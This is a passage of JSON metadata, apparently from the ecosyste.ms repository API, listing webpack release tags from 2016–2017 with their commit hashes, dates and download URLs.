pack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","downloa